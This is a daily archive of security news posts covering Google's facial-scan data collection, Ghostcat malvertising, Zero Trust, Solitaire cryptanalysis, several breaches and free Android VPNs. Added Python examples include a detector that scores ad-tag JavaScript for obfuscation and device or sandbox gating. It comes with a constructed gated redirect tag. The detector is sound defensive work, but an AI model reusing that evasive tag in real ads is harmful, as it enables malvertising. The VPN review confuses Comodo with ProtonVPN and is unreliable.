Daily Archives: October 4, 2019

Google Allegedly Used Deceptive Tactics for Facial Recognition

A Google-funded facial recognition project used deceitful methods to get people to agree to have their faces scanned.

According to a Daily News report, contractors working for Google through an external company were instructed to target dark-skinned people, college students, and the homeless to amass data for the company’s smartphone facial recognition technology. 

The contractors were allegedly instructed by a Netherlands-based staffing company called Randstad to use misleading or deceptive practices to get their subjects to agree to have their faces scanned in exchange for $5 gift cards.

“We were told not to tell (people) that it was video, even though it would say on the screen that a video was taken,” one contractor told the Daily News. 

“It was a lot of basically sensory overloading the person into getting it done as quickly as possible and distracting them as much as possible so they didn’t even really have time to realize what was going on,” another contractor said.

Another contractor spoke of being deployed to Atlanta and to the BET Awards in Los Angeles to specifically target African-Americans. 

A spokesperson for Google defended the initiative as being critical to have a “diverse sample, which is an important part of building an inclusive product.” 

Other reports have described contractors misleading potential subjects about how the data would be used and how long it would be kept. While Google was initially quoted as saying the facial scans would be held for 18 months, a photo obtained by the Daily News shows a significantly more open-ended agreement:

“Research Data will be retained for as long as needed to fulfill the Purposes, which is expected to be about 5 years, but it may be as long as necessary for the Purposes due to the extended time needed for collection, analysis, or other logistical considerations…. There is no limit to how long or in what manner Google may retain, use or share the Aggregate Data,” says the official consent agreement for the project.

Several students reported that the contractors who approached them for facial scans posed as fellow college students.

“They said they wanted us to test out a new phone, an Android. I put in my email. My guy told me to do it all really quick. He kept saying, ‘Hit next and upload. Next and upload.’ I thought they were students. We’re new here and trying to make friends,” said a college freshman.

“They said it was a survey and we thought they were students. I don’t think I even realized there was a consent form,” said another student.

Google’s stated purpose for the data is for a facial recognition-based security measure for its upcoming Pixel 4 smartphone, but it has also pursued facial recognition technology in several other product lines and initiatives. 

The post Google Allegedly Used Deceptive Tactics for Facial Recognition appeared first on Adam Levin.

Signal Messenger Bug Lets Callers Auto-Connect Calls Without Receivers’ Interaction

Almost every application contains security vulnerabilities, some of which you may find today, while others remain invisible until someone else finds and exploits them; that is the harsh reality of cybersecurity in its current state. And Signal Private Messenger, promoted as one of the most secure messengers in the world, is no exception. Google Project Zero

Is Your Browser Haunted With Ghostcat Malware?

October is finally upon us, and things are spookier than usual. One ghost causing hocus pocus across the web is Ghostcat-3PC, browser-hijacking malware behind at least 18 different malvertising campaigns in the last three months. According to SC Magazine, Ghostcat’s goal is to hijack users’ mobile browsing sessions, and it specifically targets website visitors in the U.S. and Europe.

How exactly does this ghost begin its haunting? The infection begins when a user visits a particular website and is served a malicious advertisement. Ghostcat then fingerprints the browser (collects information about the device and browser in order to identify it) to determine whether the ad is running on a genuine webpage, and checks whether that page belongs to one of the more than 100 online publishers specifically targeted by the campaign. Only if both conditions are met does the malware serve a malicious URL linked to the ad.

From there, the malicious URL delivers obfuscated JavaScript: source code deliberately rewritten so that it is hard to read and hard to match against signatures. The attackers behind Ghostcat use this technique to slip past the publishers’ ad blockers, which would otherwise detect the malicious content. The code then checks further conditions before the attack proceeds: that it is running on a mobile device in a mobile-specific browser, that the device is located in a targeted country, and that it is on a genuine website rather than a testing environment. If the browsing environment matches the target profile, the malware serves a fraudulent pop-up that leads the user to malicious content.
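The gating and obfuscation behaviour described above is what an ad-quality or security team can look for before a creative is served. The following is an added example written for this page, not Ghostcat’s code or SC Magazine’s analysis: a small static triage that scores an ad tag’s JavaScript for the traits the article lists (device and host gating, sandbox checks, decode chains, hex-escape obfuscation). The three sample tags, the indicator patterns, the weights and the review threshold are all constructed assumptions.

```python
"""Static triage of an ad-tag script for the traits described above:
environment gating (device, host, sandbox checks), decode/eval chains and
hex-escape obfuscation. Added example for this page, not Ghostcat's code;
the sample tags are constructed and the weights and thresholds are assumptions."""
import re
from dataclasses import dataclass, field
from typing import List

# (name, pattern, weight): presence of each pattern adds its weight once.
INDICATORS = [
    ("ua_fingerprint", r"navigator\.(userAgent|platform|language|languages)", 2),
    ("mobile_gate", r"(Android|iPhone|iPad|Mobile)[^\n]*\.test\(", 2),
    ("host_gate", r"location\.(hostname|host)\s*[!=]==?", 2),
    ("locale_gate", r"(resolvedOptions\(\)\.timeZone|getTimezoneOffset\(\))", 1),
    ("sandbox_check", r"(navigator\.webdriver|callPhantom|top\s*!==?\s*(self|window))", 2),
    ("dynamic_eval", r"\b(eval|Function)\s*\(", 2),
    ("decode_chain", r"(atob|unescape|decodeURIComponent|String\.fromCharCode)\s*\(", 2),
    ("redirect", r"(location\.(href|replace|assign)|window\.open)\s*[=(]", 1),
]
COMPILED = [(n, re.compile(p), w) for n, p, w in INDICATORS]
ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
ESCAPE_DENSITY_LIMIT = 0.02   # assumed: escapes per character above which we flag
ESCAPE_WEIGHT = 4
REVIEW_THRESHOLD = 6          # assumed: score at which a tag goes to manual review


@dataclass
class Triage:
    score: int = 0
    escape_density: float = 0.0
    hits: List[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        return "review" if self.score >= REVIEW_THRESHOLD else "low"


def triage(src: str) -> Triage:
    """Score one script body; each indicator counts once regardless of repeats."""
    t = Triage()
    for name, rx, weight in COMPILED:
        if rx.search(src):
            t.hits.append(name)
            t.score += weight
    t.escape_density = len(ESCAPE_RE.findall(src)) / max(len(src), 1)
    if t.escape_density >= ESCAPE_DENSITY_LIMIT:
        t.hits.append("hex_escapes")
        t.score += ESCAPE_WEIGHT
    return t


# Constructed samples (not real creatives).
BENIGN_TAG = r"""(function(){
  var img = new Image();
  img.src = "https://metrics.example/pixel?ref=" + encodeURIComponent(document.referrer);
})();"""

GATED_TAG = r"""(function(){
  var ua = navigator.userAgent;
  if (!/Android|iPhone|Mobile/.test(ua)) return;          // mobile only
  if (location.hostname !== "news.example") return;       // one targeted publisher
  if (navigator.webdriver || top !== self) return;        // not in a scanner or test frame
  var p = atob("aHR0cHM6Ly9sYW5kaW5nLmV4YW1wbGUv");       // https://landing.example/
  setTimeout(function(){ location.href = p; }, 1500);     // late redirect to the pop-up
})();"""

OBFUSCATED_TAG = r"""var _0x=["\x6c\x6f\x63\x61\x74\x69\x6f\x6e","\x68\x72\x65\x66"];
window[_0x[0]][_0x[1]]=atob("aHR0cHM6Ly9sYW5kaW5nLmV4YW1wbGUv");"""

if __name__ == "__main__":
    for label, tag in (("benign", BENIGN_TAG), ("gated", GATED_TAG), ("obfuscated", OBFUSCATED_TAG)):
        t = triage(tag)
        print(f"{label:10s} score={t.score:2d} verdict={t.verdict:6s} hits={t.hits}")
```

Scoring static text only catches what is visible in the tag itself. A creative that fetches its real payload from the returned URL at run time still has to be detonated in an instrumented mobile browser profile, which is exactly the environment the gating checks above are designed to recognise and avoid, so the triage is a filter in front of dynamic analysis, not a replacement for it.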

So, what are some proactive steps users can take to avoid being haunted by Ghostcat? Follow these tips to avoid the malware’s hocus pocus:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those that come from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which will flag sites that may be malicious, including ones you would not otherwise spot.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Is Your Browser Haunted With Ghostcat Malware? appeared first on McAfee Blogs.

Hundreds of New Cybersecurity Jobs Created in Ireland

Ireland is cementing its reputation as an international security hub after four companies announced 400 new cybersecurity jobs in the Emerald Isle in the past three weeks. 

Yesterday, American insurance company Aflac Incorporated announced that it will be opening a new Global IT and Cybersecurity Innovation Center as part of a multimillion-dollar investment in Northern Ireland. 

Belfast has been chosen as the location of the new center, which will create 150 new jobs over the next five years, with an average salary of $55,500. 

“We conducted extensive research in Europe to identify a location that not only has the expertise in IT development and cybersecurity to support our business strategy, but also complements our company culture. We believe we have found that here," said Virgil Miller, executive vice president and chief operating officer of Aflac US. 

Belfast has also been chosen as the location of Contrast Security's new development and delivery center. The DevSecOps company's new facility, announced at the end of September, will bring 120 new jobs to the local economy.

Cybersecurity firm MetaCompliance said on September 30 that it would be creating 70 new jobs in the Northern Irish city of Derry as part of a $5.5 million global expansion plan. The new positions will focus on developing cloud-based solutions for the cybersecurity learning market. 

Also in September, American cybersecurity consulting firm Security Risk Advisors opened its European Headquarters and Security Operations Centre in the southern Irish city of Kilkenny. The site will create 52 jobs over the next five years.

This year's growth in Ireland's cybersecurity sector follows reports in December 2018 that cybersecurity firm Imperva would be creating a new base in Belfast that would generate 220 new jobs.

Invest Northern Ireland has played a key role in this flurry of investment, supporting Imperva's new base with £1.4m, the MetaCompliance expansion with £695,000, and the new Contrast Security center with £786,500 of assistance. The agency also offers support through its Skills Growth Programme. 

With so many new jobs being created, the only thing that could prevent Ireland from becoming the biggest star on the international cybersecurity stage is a lack of housing and skilled labor. 

Speaking to the Irish Examiner after the FutureSec conference in Cork on September 24, Ronan Murphy, CEO of multinational cybersecurity firm SmartTech247, said: "The housing crisis is seriously affecting our ability to scale. We're building our own very sophisticated AI and machine learning which we will distribute globally. It's pretty cool that we're doing it from Cork, but there's nowhere to live."

Also speaking to the Irish Examiner post-conference, Koos Lodewijkx, vice president of IBM, which has offices in Dublin, Cork, and Galway, said: "It is a challenging time, and staffing is still in short supply. We would like to expand, but it's hard to find employees."

Decrypting What Zero Trust Is, And What It Likely Isn’t

It’s always an indicator of confusion when, instead of hearing “I want Q”, I’m asked “what is Q?”. In this case the ‘Q’ is Zero Trust. I’ll give my best take on what I understand Zero Trust to be.

History Repeats

Let’s start with the background. Quite a while back the Jericho Forum proposed a change to the trust model, to the effect that if hosts could be self-defending then perimeter controls were not required. There was interest in the idea of more secure hosts, but the proposal had flaws: there weren’t many organizations where all hosts were managed or controlled, and network or volumetric DDoS attacks meant even well-managed hosts could be taken down without network controls.

There was a variation on the Jericho-like models in which a central security controller would manage all security. This was a precursor to NAC, and the model had the flaw that the controller itself would become the target, including of DDoS. One improvement was the idea that an unmanaged host could still be treated as an asset to be defended in some way. This became the precursor to what we would later call NAC, although NAC’s scope would be much more precise and would deal better with availability. NAC isn’t everywhere, because of other challenges, but it is a viable safeguard.

Zero Trust seems to be a variation on Jericho and NAC, but instead of focusing on self-defending hosts the model is based on not allowing activity from untrusted entities. It turns out that denying untrusted entities goes back 30 years in firewalling as ‘Deny-All’. It’s been a best practice that the last rule in a firewall rule base is almost always Deny-All. Another long-serving principle has been least privilege, meaning that you don’t allow entities more privilege than they need.

Lots of Security Technologies and Markets That Get Into the Discussion

Microsegmentation has been a very cool area of security tech. In a nutshell, microsegmentation is about being more explicit about which zones have the privilege to communicate with which, having more zones, and not limiting the controls to ‘north-south’ traffic. The most common example of north-south communication is internet to web server to app server to data server. I mention microsegmentation because it evolved primarily to enforce separation and segmentation of east-west communication, in response to the increase in lateral-movement attacks. One example use case is making sure the dev web server can’t communicate with the live prod web server. In short, it is a technology for making sure that things at the same tier aren’t assumed to trust one another.

I include IPS and EPP as technologies here as well: EPP because an agented endpoint has exceptional security value, and IPS because virtual inline patching means that unmanaged or unagented endpoints can still be protected from exploitation. In allowing A to talk to B, the state of A and B has great security relevance.
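To make the combination concrete (Deny-All as the last rule, explicit least-privilege allows, zones rather than tiers, and the posture of both ends of a flow), here is an added example written for this page, not the author’s code or a Trend Micro product model: a small flow-policy evaluator. The zone names, ports, endpoint posture fields and the sample flows are assumptions chosen to match the cases discussed above.

```python
"""Deny-all flow policy with explicit least-privilege allows, zone-based
microsegmentation and endpoint posture. Added example written for this page,
not a Trend Micro product or the author's code; zone names, ports and
posture fields are assumptions."""
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Endpoint:
    name: str
    zone: str               # segment the endpoint sits in (assumed zone names below)
    managed: bool = False   # under management with an EPP agent
    shielded: bool = False  # protected by an inline network IPS (virtual patching)


@dataclass(frozen=True)
class Rule:
    src_zone: str
    dst_zone: str
    dst_port: int
    managed_src_only: bool = False  # least privilege: only agented sources get this path


# The explicit allow list. Everything not matched here falls through to Deny-All,
# including east-west traffic between peers of the same tier.
RULES = (
    Rule("internet", "prod-web", 443),
    Rule("prod-web", "prod-app", 8443),
    Rule("prod-app", "prod-db", 5432, managed_src_only=True),
    Rule("clinical", "pacs", 104),  # the unmanaged MRI may send DICOM to the archive, nothing else
)


def decide(src: Endpoint, dst: Endpoint, port: int, rules=RULES) -> Tuple[bool, str]:
    """Return (allowed, reason) for a single flow src -> dst:port."""
    for r in rules:
        if (r.src_zone, r.dst_zone, r.dst_port) != (src.zone, dst.zone, port):
            continue
        if r.managed_src_only and not src.managed:
            return False, f"{src.name} is unmanaged; rule requires an agented source"
        # The destination's posture matters too: an unmanaged, unshielded target is
        # reachable by nobody until it is either agented or put behind the IPS.
        if not (dst.managed or dst.shielded):
            return False, f"{dst.name} is neither managed nor IPS-shielded"
        return True, f"allowed by {r.src_zone}->{r.dst_zone}:{r.dst_port}"
    return False, "no matching rule (Deny-All)"


def evaluate(flows: Iterable[Tuple[Endpoint, Endpoint, int]]) -> List[Tuple[str, str, int, str]]:
    """Run observed flows through the policy and return only the denied ones:
    the segmentation gaps or 'surprise' lateral movements worth a look."""
    denied = []
    for s, d, p in flows:
        ok, why = decide(s, d, p)
        if not ok:
            denied.append((s.name, d.name, p, why))
    return denied


# Constructed endpoints and flows, matching the cases in the text.
INTERNET = Endpoint("internet-client", "internet")
PROD_WEB = Endpoint("web01", "prod-web", managed=True)
DEV_WEB = Endpoint("web-dev", "dev-web", managed=True)
PROD_APP = Endpoint("app01", "prod-app", managed=True)
PROD_DB = Endpoint("db01", "prod-db", managed=True)
LEGACY_DB = Endpoint("db-legacy", "prod-db", managed=False, shielded=True)
MRI = Endpoint("mri-3t", "clinical", managed=False)
PACS = Endpoint("pacs01", "pacs", managed=True)

SAMPLE_FLOWS = [
    (INTERNET, PROD_WEB, 443),    # north-south, allowed
    (PROD_WEB, PROD_APP, 8443),   # next tier, allowed
    (PROD_APP, PROD_DB, 5432),    # agented app to db, allowed
    (PROD_APP, LEGACY_DB, 5432),  # unmanaged db, but shielded by the IPS, allowed
    (DEV_WEB, PROD_WEB, 443),     # same tier, east-west: Deny-All
    (PROD_WEB, PROD_DB, 5432),    # tier skip: Deny-All
    (MRI, PACS, 104),             # unmanaged device on its one permitted path
    (MRI, PROD_DB, 5432),         # unmanaged device wandering: Deny-All
]

if __name__ == "__main__":
    for src, dst, port, why in evaluate(SAMPLE_FLOWS):
        print(f"DENY {src} -> {dst}:{port}  ({why})")
```

The useful output is the denied list: fed with flows actually seen on the network, what comes back is either a rule that is missing on purpose (a gap to fix) or a path nobody designed (lateral movement to investigate), which is the check a flat, north-south-only design never gives you.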

Naughty Marketing Has Confused Things

I’ve observed that conflating what ‘zero’ and ‘trust’ mean has been an issue. One group of definitions and marketing claims that you end up not having to trust anything and thus have zero risk. Ugh. Trust isn’t binary except in very few environments. Think about IoT. Knowing that something is unpatched, has no agent, and yet must be a member of my network is very useful. An MRI machine. Do I trust it? Not completely. The second group of definitions centers on not trusting things blindly. That is a much more reasonable view, and it is what Deny-All has always been about, together with the rules or exceptions above the Deny-All rule. Within that Deny-All variation, elements of least privilege are sometimes attached.

So What Is Zero Trust?

I don’t think that Zero Trust is a market or a product type. Buying a product with a lot of Zero Trust labeling won’t fix your security on its own. My thinking is that Zero Trust is more a model or guiding design principle; Deny-All, least privilege, NAC, and microsegmentation may be some or all of the technologies or approaches. Never be deluded that security architecture is easy: in my opinion it is the most advanced and challenging role and task in security. All security architectures do need to consider, though, whether the network is too flat, how unmanaged endpoints are dealt with, and how separation, segmentation and isolation are regulated. So look to implementing the good principles of Zero Trust, but beware of overly enthusiastic marketing of it as something it likely isn’t. I like Chase Cunningham’s blog post on “Zero Trust On a Beer Budget”. (go.forrester.com/blogs/zero-trust-on-a-beer-budget)

OK, OK, But What Products Enable Zero Trust?

Yeah, I do tend to go on, sorry.  So here are the products within the Trend portfolio that best help implement a Zero Trust model, and what element:

  • EPP (Endpoint Protection Platform): an agented endpoint minimizes loss of control and maximizes identification; 2FA, whitelisting, application control, and encryption on endpoints. Apex One
  • CWPP (Cloud Workload Protection Platform): whitelisting of apps and resources, and control of servers and containers across multiple clouds. Deep Security
  • Network IPS: shielding resources that can’t otherwise be managed. TippingPoint
  • Network Analytics: mapping out, after the fact, where you have holes in your architecture, especially ‘surprise’ lateral movements. Deep Discovery


More Cryptanalysis of Solitaire

In 1999, I invented the Solitaire encryption algorithm, designed to manually encrypt data using a deck of cards. It was written into the plot of Neal Stephenson's novel Cryptonomicon, and I even wrote an afterword to the book describing the cipher.

I don't talk about it much, mostly because I made a dumb mistake that resulted in the algorithm not being reversible. Still, for the short message lengths you're likely to use a manual cipher for, it's still secure and will likely remain secure.

Here's some new cryptanalysis:

Abstract: The Solitaire cipher was designed by Bruce Schneier as a plot point in the novel Cryptonomicon by Neal Stephenson. The cipher is intended to fit the archetype of a modern stream cipher whilst being implementable by hand using a standard deck of cards with two jokers. We find a model for repetitions in the keystream in the stream cipher Solitaire that accounts for the large majority of the repetition bias. Other phenomena merit further investigation. We have proposed modifications to the cipher that would reduce the repetition bias, but at the cost of increasing the complexity of the cipher (probably beyond the goal of allowing manual implementation). We have argued that the state update function is unlikely to lead to cycles significantly shorter than those of a random bijection.
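For readers who want to see the keystream the abstract is talking about, here is an added example written for this page (not Schneier’s reference implementation): Solitaire as published, using a 54-card deck with values 1 to 52 plus jokers A and B, together with a small counter for how often consecutive keystream letters repeat. The unkeyed deck reproduces the published test vector, where the plaintext AAAAAAAAAA encrypts to EXKYIZSGEH.

```python
"""Solitaire as published: a 54-card deck (1..52, then jokers A and B) drives a
keystream; letters are added mod 26. Added example written for this page, not
Schneier's reference implementation. repeat_rate() measures the consecutive
output repetition that the abstract above discusses."""
JOKER_A, JOKER_B = 53, 54
JOKERS = (JOKER_A, JOKER_B)


def fresh_deck():
    return list(range(1, 55))  # unkeyed deck: bridge order 1..52, then A, B


def _value(card):
    return 53 if card in JOKERS else card  # both jokers count as 53


def _move_down(deck, card, places):
    for _ in range(places):
        i = deck.index(card)
        if i == len(deck) - 1:
            deck.insert(1, deck.pop())  # bottom card wraps to just below the top
        else:
            deck[i], deck[i + 1] = deck[i + 1], deck[i]


def _triple_cut(deck):
    # Swap everything above the first joker with everything below the second.
    i, j = sorted((deck.index(JOKER_A), deck.index(JOKER_B)))
    return deck[j + 1:] + deck[i:j + 1] + deck[:i]


def _count_cut(deck, n):
    # Move the top n cards to just above the bottom card; n == 53 is a no-op.
    return deck[n:-1] + deck[:n] + deck[-1:]


def step(deck):
    """One state update (steps 1-4). Returns a new deck; the input is untouched."""
    deck = list(deck)
    _move_down(deck, JOKER_A, 1)
    _move_down(deck, JOKER_B, 2)
    deck = _triple_cut(deck)
    return _count_cut(deck, _value(deck[-1]))


def key_deck(passphrase):
    """Key the deck from a passphrase: per letter, one state update followed by
    a count cut by that letter's number (A=1 .. Z=26)."""
    deck = fresh_deck()
    for ch in passphrase.upper():
        if "A" <= ch <= "Z":
            deck = _count_cut(step(deck), ord(ch) - 64)
    return deck


def keystream(deck, n):
    """Return n keystream values (1..52) and the final deck state."""
    out = []
    while len(out) < n:
        deck = step(deck)
        card = deck[_value(deck[0])]  # count down by the top card's value
        if card not in JOKERS:        # a joker yields no output; update again
            out.append(card)
    return out, deck


def _letters(text):
    return [c for c in text.upper() if "A" <= c <= "Z"]


def encrypt(plaintext, passphrase=""):
    letters = _letters(plaintext)
    ks, _ = keystream(key_deck(passphrase), len(letters))
    return "".join(chr((ord(p) - 65 + k) % 26 + 65) for p, k in zip(letters, ks))


def decrypt(ciphertext, passphrase=""):
    letters = _letters(ciphertext)
    ks, _ = keystream(key_deck(passphrase), len(letters))
    return "".join(chr((ord(c) - 65 - k) % 26 + 65) for c, k in zip(letters, ks))


def repeat_rate(passphrase, n=2000):
    """Fraction of consecutive keystream letters (values mod 26) that repeat.
    A uniform source would give 1/26 ~= 0.0385; the bias the paper models
    shows up as a rate above that over a long run."""
    ks, _ = keystream(key_deck(passphrase), n)
    vals = [k % 26 for k in ks]
    return sum(a == b for a, b in zip(vals, vals[1:])) / (n - 1)


if __name__ == "__main__":
    print(keystream(fresh_deck(), 10)[0])            # published vector: 4 49 10 24 8 51 44 6 4 33
    print(encrypt("AAAAA AAAAA"))                      # EXKYIZSGEH
    print(round(repeat_rate("CRYPTONOMICON", 5000), 4), "vs uniform", round(1 / 26, 4))
```

The keystream() loop skips a joker and updates the state again, so the numbers in the published vector that appear in parentheses never reach the plaintext. repeat_rate() is a crude statistic, not the model in the paper, but it is enough to see the effect the abstract describes: run it with a few passphrases and a long n and compare against 1/26.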

Amex Employee Suspected of Wrongfully Accessing Customer Data to Commit Fraud

A former employee of American Express is under investigation by the police for allegedly accessing customer information with the intent to commit fraud. 

The exact details of the incident have not been disclosed, but the employee is thought to have wrongfully accessed the personal information of Amex customers in America in an attempt to open accounts at other financial institutions. 

Amex began notifying customers of the data breach by letter on September 30. Customers who received the letter were told "as a result of the incident, your name, current or previously issued American Express Card account number, physical and/or billing address, date of birth, and Social Security number were compromised." 

When contacted for comment, Amex would not say precisely how many customers had been affected by the breach but stated that "only a small number of our customers were impacted."

Affected cardholders have been asked by Amex to vigilantly monitor their account statements for the next two years for signs of fraudulent charges. However, Amex has stated that customers whose information was wrongfully accessed will not be held liable for any fraudulent charges.

In the letter sent to customers to notify them of the breach, Amex offered impacted cardholders a free two-year membership with Experian's identity theft and resolution service IdentityWorks by way of compensation. Customers who are already members are being offered the opportunity to extend their coverage for two years free of charge. 

After informing them that their personal information was wrongfully accessed, the letter goes on to tell customers that they will need to entrust their Social Security number and current mailing address to the service provider if they wish to sign up for membership. 

A spokesperson for American Express told Infosecurity Magazine: "Ensuring the security of our customers’ information is our top priority, and we are investigating this matter in close partnership with law enforcement. 

"I would note that this was not a breach of American Express’ systems and the person in question is no longer an employee of American Express. In addition, only a small number of our customers were impacted, and those who are affected are being notified. 

"As a reminder, our customers are not liable for any fraudulent charges on their American Express cards. Given this is an active criminal investigation, we can’t provide any further comment."

Google Warns of Android Zero-Day Bug Under Active Attack

Flaw impacts 18 Android models including Google’s flagship Pixel handset as well as phones made by Samsung, Huawei and Xiaomi.

Answering IoT Security Questions for CISOs

Given the pervasive presence of IoT and Industrial IoT devices in our daily lives, from smart homes to smart cities, one cannot escape the growing cybersecurity risks associated with these devices. That may leave CISOs with a lot of questions about how this newer, growing attack vector could impact their business. We hope to answer a few of those questions here.

Have regulatory bodies done anything for IoT Security?

Yes. In fact, the risk has grown enough that NIST released its draft security feature recommendations for IoT devices on August 1st. The draft report identifies cybersecurity features that can make IoT devices minimally securable. Even though the report’s tagline is “A Starting Point for IoT Device Manufacturers”, its recommendations are useful to all consumers.

Do criminals really care about IoT?

The viability of IoT devices as a resource for global threat actor groups, for criminal gain and other nefarious purposes, is only starting to be recognized. In our research paper, “The Internet of Things in the Cybercrime Underground,” we detail the products and services being peddled in Russian, Portuguese, English, Arabic, and Spanish underground communities. While the current market for compromised IoT infrastructure is small, we expect it to grow significantly in the coming months and years. Unfortunately, as the cybercriminal market grows, so does the risk.

What about IIoT?

As you might expect, these risks don’t stop with consumer-grade IoT devices. The Government Accountability Office (GAO) recently released a report that raises concerns about power grid vulnerabilities. It notes the growing convergence of IT and OT as IoT devices are used throughout plants and utilities. One consequence of this convergence is that compromised IoT devices could be leveraged to take down power plants. These systemic and technical vulnerabilities could lead to cascading effects if not addressed soon. As we move toward hyperconnected homes and cities, power and communication infrastructure becomes more and more critical.

As we have collectively adopted a shared-responsibility model in cloud security, we must do the same for IoT and Industrial IoT at a global scale. It will take partnership between governments, academia, manufacturers, standards bodies, and the cybersecurity industry to make any difference. I can confidently say that we at Trend Micro are doing everything we can to partner at each level and do our part in making this security a reality.

Is IoT risk being properly addressed in your enterprise risk strategy? Share your plans or concerns.


Using the Cloud Securely: A conversation between two cybersecurity leaders

Laura Payne, Director, Information Security Services, BMO; Lakshmi Hanspal, CISO, Box. When Box CISO Lakshmi Hanspal and BMO Director of Information Security Services Laura Payne struck up a conversation at a recent security conference in Toronto, the connection was immediate. These two women not only shared a passion for cyber security in a space still…

EA Games Leaks Personal Data of 1600 FIFA 20 Competitors

EA Games has leaked the personal data of 1600 gamers who registered to take part in a competition via the company's website. 

Contenders signing up for the FIFA 20 Global Series competition were asked to enter personal information into what should have been a blank online form to verify their EA account details. Instead, the form's fields were pre-populated with the personal information of gamers who had already signed up for the soccer video game challenge.

Personal information compromised in the breach included email addresses, account ID numbers, usernames, and dates of birth. 

Rather ironically, the breach occurred just hours after EA Games announced that users switching on two-factor authentication would get free access to an Origin Access Basic subscription for four weeks as part of the UK's National Cyber Security Month.

Gamers took to Twitter to vent their frustrations regarding the breach, with one gamer who was confronted with the personal data of a fellow competitor joking that he would send the player a birthday card.

Another gamer, whose personal information was leaked during the breach and who is on Twitter as @Kurt0411Fifa, tweeted: "Before I get to the absolute farce of that competitive bullsh*t, when you click the link register for verification you get other people's personal information!!!!!! WTFF, this is a new low even for this joke of a company."

It didn't take EA Games long to become aware of their balls-up, and the registration page was taken down yesterday, just 30 minutes after it was first put up. 

In a statement regarding the breach released on Twitter yesterday, EA Games said: "We were able to root cause the issue and implement a fix to be clear that information is protected. We're confident that players will not see the same issues going forward."

The games publishing company also said it was taking steps to contact the 1600 gamers affected by the breach with more details and to protect their accounts. 

When contacted for comment by Infosecurity Magazine, EA Games said: "We have issued a couple statements to our community on this topic but aren’t in a position to discuss further at this point. However, I will keep you updated if that should change or we make any further statements."

Registration for the competition remains closed but is expected to re-open in the next few days.

Free VPN for Android You Can Use in 2019

Why buy when you can use it for free? Instead of paying for premium services, why not use a free VPN for Android? Many of these apps have similar features, so you may get much the same thing from a free one. Of course, such services have their pros and cons, so we’ll thrash out the advantages and disadvantages of each below.

For now, the key point is that you need VPN protection for your Android device, which we’ll discuss here. Check our guide for excellent VPN services that you can use free.

Conventional wisdom says that free services don’t always offer excellent features. Maybe. However, we found some free VPNs for Android that can match some of the premium services.

Comodo VPN

Comodo VPN is a brilliant option if you’re searching for a free Android VPN service. The app doesn’t have ads, nor does it push you to upgrade to its premium service. It is outstanding VPN software.
Please note that you can’t download it in some countries, so you might use a temporary VPN to access it. Such irony!

Nevertheless, the app claims to have a comprehensive network of servers, so you shouldn’t have connection issues. Moreover, it offers unlimited usage. If you’re concerned about security, you’ll be glad to know that it doesn’t log your usage.

Some of the essential features of this app are fast speed, support for Tor, and a rerouting system. If there is something to complain about with ProtonVPN, it is that it has a few bugs. Fortunately, these issues aren’t dangerous for users.

I installed Comodo, and the app prompted me to register. I checked my email for the verification code. After entering it, I picked the country I’m in and connected to a server. I tried a few servers before I was able to connect to one with a robust signal.

I noticed that the speed dropped after connecting to a server. I had a 30Mbps connection, but I wasn’t getting over 1Mbps after connecting to Proton.

Pros:
Reliable and secure
Rich in features
Speedy performance

Cons:
Unstable

OpenVPN Connect

OpenVPN Connect is exceptional because it can equal the features of paid services. It uses enterprise-grade encryption, unlike the other free apps. Moreover, it is one of only two open-source VPNs on the Google Play Store.

I tried the app and learned that it doesn’t require users to register. I preferred the auto-deploy option and was able to install it easily. I got a prompt to choose the server I wanted. However, access to the private tunnel requires registration. Also, I discovered that the speed dropped immensely, from 30Mbps to 1.2Mbps.

Pros:
Rich in features
Secured
Almost real-time connection to servers

Cons:
Setup is a bit technical

SurfEasy

SurfEasy is another free VPN app for Android. If you check the Google Play Store, you’ll discover that it has excellent comments and reviews. Users especially love that it provides a secure network connection without pestering ads.

The company doesn’t specify its logging policy, so if you’re security conscious, check the app’s terms and conditions before you download it. If you need a VPN service, SurfEasy will do, but it doesn’t provide any extraordinary features.

I was glad that I was able to pick a server quickly. Moreover, the software doesn’t require much and has no annoying details. I also like that it combines a proxy to secure the connection. Lastly, it doesn’t have any significant impact on speed.

Pros:
Effective and simple
Ease of use
Blocks ads

Cons:
Doesn’t support torrent downloading

SpeedVPN

For the average user, the manual setup of a VPN is inconvenient. Many people prefer an app that’s up and running upon installation; they don’t want anything too technical or that requires a lot of thought. They’ll surely love SpeedVPN, because it connects immediately with a single tap.

I like this free VPN for Android because it’s very efficient. Unfortunately, you can only use it for an hour at a time, but you can reconnect quickly. This limit keeps bandwidth speeds high. On the downside, it only has a few servers, and it’s full of ads.

Pros:
Unique features for network speed
Takes only a click to connect
Easy to use

Cons:
Obtrusive in-app ads

VPN Robot

VPN Robot offers fast connections and unlimited bandwidth, with numerous servers in six locations. If you’re looking for an excellent VPN, you can consider this app, although it isn’t ad-free. On the upside, it doesn’t record user data: it has robust data encryption and a no-logging policy. Another downside is that connecting is slow, but once connected you’ll have a seamless experience.

Pros:
Fast performance
Excellent security features

Cons:
Intermittent connection issues

Hola VPN

Hola VPN Proxy is also a remarkable option because it encrypts the data your device sends and receives. Unlike other services, it has exceptional features. I had fun using this app because it offers numerous location alternatives. Moreover, I could even watch American Netflix easily.

Pros:
Stable speed without ISP Throttling
At least 70 server locations
Offers Caller ID
Unblocks Netflix, Spotify, BBC, and Hulu

Cons:
Not ad-free

Touch VPN

You may try Touch VPN, as it guards your Wi-Fi connection against hackers who could steal data from your device. Moreover, you can use stealth mode to remain anonymous. I enjoy the connection because it’s quicker and doesn’t use much memory.

I tried this free VPN for Android app and learned that it requires registration. It has many ads, but it’s user-friendly. If you use this software, you’ll find that you can connect to servers in approximately 40 countries, although some servers charge a fee. Unlike the other VPNs, the speed doesn’t drop significantly.

Pros:
Free
Unlimited bandwidth
Simple and easy-to-use interface
24/7 user support

Cons:
Slow download speed
Has a policy for data logging
Doesn’t work with TOR browser

Conclusion

